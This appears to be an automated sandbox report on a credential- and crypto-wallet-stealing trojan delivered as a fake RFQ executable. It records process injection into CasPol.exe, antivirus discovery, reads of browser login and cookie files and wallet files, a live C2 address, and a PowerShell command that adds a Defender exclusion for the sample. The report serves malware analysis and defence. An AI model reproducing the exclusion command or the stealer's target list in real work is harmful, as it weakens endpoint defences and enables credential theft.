                    Source: Amcache.hve.10.dr; Binary or memory string: \driver\vmci,\driver\pci
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Amcache.hve.10.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Amcache.hve.10.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe; Process queried: DebugPort
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 41A000
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 41C000
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 29D008
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Queries volume information: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                    Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.10.dr | Binary or memory string: MsMpEng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2322806230.000002DBAA700000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDER8A823C34
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR
                    MITRE ATT&CK Matrix (one row per matrix row, 14 tactic columns; a number in front of a technique name is the count displayed in that cell of the original matrix)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 DLL Side-Loading | 311 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 341 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 3 Data from Local System | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 251 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Behavior Graph (text rendering of the graph figure)

                    Behavior Graph ID: 1557873
                    Sample: RFQ_TFS-1508-AL NASR ENGINE...
                    Start date: 18/11/2024
                    Architecture: WINDOWS
                    Score: 100
                    DNS/IP info at the root: api.ip.sb
                    Signatures at the root: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
                    Process started: RFQ_TFS-1508-AL NASR ENGINEERING.exe
                        Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 4 other signatures
                        Child processes started: CasPol.exe; powershell.exe; WerFault.exe; 2 other processes
                        CasPol.exe
                            DNS/IP info: 193.70.111.186, 13484, 49704, 49714 OVHFR France
                            Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
                            Child process started: conhost.exe
                        powershell.exe
                            Signatures: Loading BitLocker PowerShell Module
                            Child process started: conhost.exe

                    Source | Detection | Scanner | Label | Link
                    RFQ_TFS-1508-AL NASR ENGINEERING.exe | 49% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno |
                    RFQ_TFS-1508-AL NASR ENGINEERING.exe | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://193.70.111.186:13484t- | 0% | Avira URL Cloud | safe |
                    193.70.111.186:13484 | 0% | Avira URL Cloud | safe |
                    http://193.70.111.186:13484 | 0% | Avira URL Cloud | safe |
                    http://193.70.111.186:13484/ | 0% | Avira URL Cloud | safe |
                    http://193.70.111.186:13484pE | 0% | Avira URL Cloud | safe |
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      193.70.111.186:13484true
                      • Avira URL Cloud: safe
                      unknown
                      http://193.70.111.186:13484/true
                      • Avira URL Cloud: safe
                      unknown
URLs from Memory and Binaries
Source legend (memory dumps and dropped files referenced in the table):
[M0] RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp
[M1] CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp
[M2] CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmp
[M3] CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp
[M4] CasPol.exe, 00000005.00000002.2221153349.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp
[M5] CasPol.exe, 00000005.00000002.2221153349.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp
[M6] CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp
[M7] CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp
[T] tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.dr

Name | Source | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/ip%appdata% | [M0], [M1] | false | - | high
https://duckduckgo.com/chrome_newtab | [M7], [T] | false | - | high
https://duckduckgo.com/ac/?q= | [M7], [T] | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | [M7], [T] | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | [M2] | false | - | high
http://tempuri.org/Endpoint/CheckConnectResponse | [M2] | false | - | high
http://schemas.datacontract.org/2004/07/ | [M5] | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX | [M2] | false | - | high
http://193.70.111.186:13484 | [M6], [M2] | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettings | [M3], [M2] | false | - | high
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | [M0], [M1] | false | - | high
https://api.ip.sb | [M3] | false | - | high
https://api.ip.sb/geoip | [M3] | false | - | high
http://schemas.xmlsoap.org/soap/envelope/ | [M2] | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | [M7], [T] | false | - | high
http://tempuri.org/ | [M2] | false | - | high
http://upx.sf.net | Amcache.hve.10.dr | false | - | high
http://tempuri.org/Endpoint/CheckConnect | [M2] | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | [M7], [T] | false | - | high
http://193.70.111.186:13484t- | [M6] | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | [M7], [T] | false | - | high
http://tempuri.org/Endpoint/VerifyUpdateResponse | [M2] | false | - | high
http://tempuri.org/Endpoint/SetEnvironment | [M4], [M6], [M2] | false | - | high
http://tempuri.org/Endpoint/SetEnvironmentResponse | [M2] | false | - | high
